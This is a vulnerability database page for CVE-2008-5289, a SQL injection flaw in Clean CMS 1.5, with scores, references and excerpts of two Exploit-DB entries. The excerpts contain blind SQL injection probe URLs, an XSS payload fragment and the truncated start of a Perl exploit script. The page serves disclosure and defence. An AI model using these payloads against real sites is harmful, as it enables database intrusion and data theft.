CVE-2008-5289
published 2008-12-01CVE-2008-5289: SQL injection vulnerability in full_txt.php in Werner Hilversum Clean CMS 1.5 allows remote attackers to execute arbitrary SQL commands via the id parameter.
PriorityP341high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
1.21%
64.5th percentile
SQL injection vulnerability in full_txt.php in Werner Hilversum Clean CMS 1.5 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scripts4you | clean_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting
exploitdb·2008-11-25
CVE-2008-5290 Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting
Clean CMS 1.5 - Blind SQL Injection / Cross-Site Scripting
---
[~] Clean CMS 1.5 Blind Sql & XSS Multiple Remote Vuln.
[~]
[~] script: http://www.4yoursite.nl/script_clean_cms.php
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu msn: [email protected]
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] N0T: RedHaK Kardesime ozel tesekurler.
[~] -----------------------------------------------------------
exp for demo:
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=4 ( true )
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=19+and+substring(@@version,1,1)=3 ( false )
XSS for demo:
http://www.4yoursite.nl/demo/clean_cms/full_txt.php?id=">aler
Exploit-DB
Clean CMS 1.5 - Blind SQL Injection
exploitdb·2008-11-25
CVE-2008-5289 Clean CMS 1.5 - Blind SQL Injection
Clean CMS 1.5 - Blind SQL Injection
---
# Clean CMS 1.5 (full_txt.php id) Blind SQL Injection Exploit
# url: http://www.4yoursite.nl/script_clean_cms.php
#
# Author: JosS
# mail: sys-project[at]hotmail[dot]com
# site: http://hack0wn.com && spanish-hackers.com
# team: Spanish Hackers Team - [SHT]
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Hack0wn :D
my $MAX_FIELD_LENGTH = 200 ;
my $EXIT_IF_NO_CHAR = 1 ;
my $DEFAULT_THREADS = 15 ;
my $DEFAULT_THREADS_TIMEOUT = 30 ;
my @ascii = ( 32 .. 123 ) ;
my $DEFAULT_THREADS_TIME = 1 ;
use LWP::UserAgent ;
sub _HELP_AND_EXIT
{
die "
./$0 -u -p
Options:
-u Ex: http://localhost/full_txt.php?id=19
-p HTML pattern.
Other:
-t Threads, default '$DEFAULT_THREADS'.
-l Maxim
No writeups or analysis indexed.
http://secunia.com/advisories/32866http://securityreason.com/securityalert/4666http://www.securityfocus.com/bid/32474https://exchange.xforce.ibmcloud.com/vulnerabilities/46838https://www.exploit-db.com/exploits/7228https://www.exploit-db.com/exploits/7230http://secunia.com/advisories/32866http://securityreason.com/securityalert/4666http://www.securityfocus.com/bid/32474https://exchange.xforce.ibmcloud.com/vulnerabilities/46838https://www.exploit-db.com/exploits/7228https://www.exploit-db.com/exploits/7230
2008-12-01
Published